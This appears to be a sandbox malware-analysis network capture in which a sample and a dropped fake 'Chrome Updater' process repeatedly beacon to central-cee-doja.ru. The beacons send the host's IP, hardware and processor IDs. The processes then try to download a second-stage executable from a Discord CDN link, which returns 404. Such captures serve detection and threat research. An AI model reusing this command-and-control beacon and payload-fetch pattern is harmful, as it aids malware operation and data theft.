                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=iKLF_0uQTL0qtMwbwkI6jtcqnROvwE8SZcDFn8ZW3Cs-1704353501-1-ARo+YSNIVo1TxrN1xCwbQTtaErd6ZpMBgsbCYcmgKke172G3mvNsqwdOzb1Nsxl1REZqqvUSyY5CIpuDqo3zVZI=; path=/; expires=Thu, 04-Jan-24 08:01:41 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xvNaOtWINQElM21FPaqSA7BpUCZUOUMIhYP8lyPgCMVEAuj1cp6FZKp4FeLaJhd%2FeBIBh3MTrznyResAPUlYAv8zAK14JUnwAwIcdsoOQTiUrdieR4xBPCU5cOjUFmDDXnNYUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=uYNDdPvZdsUIIuR8.sMPGz.w1..yswzBxwPbBZzs1pI-1704353501374-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:41 UTC33INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF
                                                                                    2024-01-04 07:31:41 UTC203INData Raw: 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: -8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    228192.168.2.649953104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:41 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:42 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YQXWQxj%2F4pIWJX7S6nd9wk9Sd3zWTJx2I2dMEm2MArizECFfqte00ygPHzcRVfjcQNSZLrBvc3PlRJNk5vLSSdPsskEY4XKkVYuHJd0TsuIoW7Olh%2FwQ6GoD4%2FNafSS6Ydhgkx6H"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c88afc54391a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:42 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    229192.168.2.649954104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:41 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:42 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KOf0EGEn9NEkee7AAGu%2B9jAbIwTvWLEkst8%2BashYzQpC8J8UxedNlWL69Qt8%2BRjt5YfcC23DpDlaMxbSchB6uJuz8OcZpvZJnQG2Px8LwaHnvktwLUnFNt9OTSPDm0sIzQ67TEje"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c88b0a3c2024-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:42 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    230192.168.2.649955162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:42 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:42 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:42 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8909f62208d-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 84
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:42 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=YYUzkcvG8Si3Z4TPhNheMcVlAJFiRECB_aZM5R7d67I-1704353502-1-AWioKttARs116PiMCTwiLJcp+AYiSWAZo/HcnwAw+Y01Afy6f8TrWTHAtTocz+GOziUWw+F5+/e2HBN+1MWIaJs=; path=/; expires=Thu, 04-Jan-24 08:01:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A0197eVZQ5iWobotNzupT3Xf1pDFks3k5qRuqt12iswFAxhka6AB4RvYOwv7IozexLJLXT6lxk7TCebLGEL8kOMfSLNcy6LzM14cq%2BshJBpHNxmwGKC%2FCBr%2B4OScZ9e%2FJ%2FDMnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=Zyh3XXkfTcAtsII8sD50Vpz0EVkm9Z1izJBHaujKUT0-1704353502853-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:42 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
                                                                                    2024-01-04 07:31:42 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    231192.168.2.649956104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:42 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:43 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iaOg0RFnbUoUoY6k96ifNHdARwXezM%2BS1V1k8fYE1HGysU7No2FAaSEAyxqj%2BnEkjAsOlhDllz%2BNFLvpjx7mC9yBCbJ6r6T0uzlnEJMvK4MTMs9gfAM4DZNOqhbshQx6r1PnoQNg"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c890ba093b53-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:43 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    232192.168.2.649957104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:43 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:43 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sbJ7hAr1fQlKHl0myLKOGHcETFrJhtDjBQPG88uEz0RAlVS9TqUE0G6KETYJHxeiFMiJ%2FKhh5O5VE4k1mSS54OH%2FNZn9ai2Wple%2FoE6E0WpIYMVnoIAF8VOJTyXb8Eck%2Bl40Sq32"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c89478c65722-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:43 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    233192.168.2.649958162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:43 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:43 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:43 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c894fb7181c1-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 65
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:43 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=0ZrOimgvQ.g6eyAWVInGIBSkjUjLNZVJXnhrYyTC6FM-1704353503-1-AQDSmLHLb6jD09XQSrO8jX9JOpADUCYpUOBkMHDy+VHJRtx0TIIMA/TcfwvmSqKKTjIXgtiExdNW4sfpouTrzks=; path=/; expires=Thu, 04-Jan-24 08:01:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=exdjsHS3Dn8sgXWi5dcP3cSEUc0WhW2M4zurZpBCZByHd2hTTyNDwPXxqn4H7TVAjub31%2Bh%2FO5WbRHlyUgQ3ZI75Emlm602ELZwKYG4U%2BTplOBnTDyei2UvJC%2BlG9RHL%2FZ9HUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=z4SrIjU.gHTf.nRH.wPaCO3GHBwwUjBociJC3K0KDq4-1704353503543-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:43 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
                                                                                    2024-01-04 07:31:43 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    234192.168.2.649959104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:43 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:44 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1GF9uGVDe7Mw441bL5CDVu3uAz2GOCJPSsFUNgf7LMcWIc6V8%2BdAAQVGUsN2RxZGx%2BRoYbsN3EQu2Gg6leBlm5PmKS2exC2wsHLjibKwg2zUN80p4zqZgehUkvhVQPvx84%2B2qODz"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c898899181f4-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:44 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    235192.168.2.649960104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:43 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:44 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zGibMJSGy5np%2FcXjcnviafQCdnDNuNXS3f6cq4D2n4Vep%2BUWy2%2BSqbWTI0VQRwnqhG1lHDjgoIwOJSQZ0h5XpPC57pkDcrSr5ZxxgZ%2BSrtfKCnbcuTkPpqBQpBF8oiVcv40F6EQ7"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c898fdf49c48-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:44 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    236192.168.2.649961104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:44 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:45 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NGlvJGZLz33R1R9Sn21DEehe%2BsPKqly6MxFSvFmDC4Ti18w9ym1xSqUC%2FTtkkVPF7UNbr%2BUHCi4L3vQOF0QMGNfE3qNibLTMuTKX50ptgIKfDNLPRgTmHX8L865H7O2nvL5C0nHH"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c89cdf2220b4-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:45 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    237192.168.2.649962162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:44 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:45 UTC1329INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:45 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c89e5f9c381e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 85
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:45 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzI
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=J5P035Anyd5xqwTMxYZNR__P5Zx8P.9QDXMhFcIIJUY-1704353505-1-Af+NRKMO8gMyFS9lYdvUCjX/0HfK0z7LjSgZQMRVc7hJoEEaVGEordAiOIxluPMwCLYyzFN8tqpN6bOGoIFkDZg=; path=/; expires=Thu, 04-Jan-24 08:01:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dOenk0pJ61Wg52xzjUWXGAQ9jjieZC5Gxeszf2FnpLFmwU8BvPytr4SpiqamQ71o2NxxDnMFyW4fOdRlyzJl4QNlWBk363zkrpEqVpVPzjvkOjIm8UYfCAoSxO%2BnxTuDMB77HA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=4ZHxdwFd8eytrF4vV80PMY6N1xm2duQv.qwCHxG_Qe4-1704353505047-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:45 UTC40INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><E
                                                                                    2024-01-04 07:31:45 UTC196INData Raw: 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: rror><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    238192.168.2.649963104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:45 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:45 UTC584INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DiaXIAd67CknqSP63MjXXu%2F7QPx4GO%2Bxa%2FUERx4E7Ev50fLPZwlvz7PdZOBrhzcI3TsAgSEz0MBuMdm7HjgHvAnLEBzB%2FQDNOB%2FXt%2BMJg8P45y3yfm%2BmfxQQfDZWyoSmsxOKpqDM"}],"group":"cf-nel","max_age":604800}
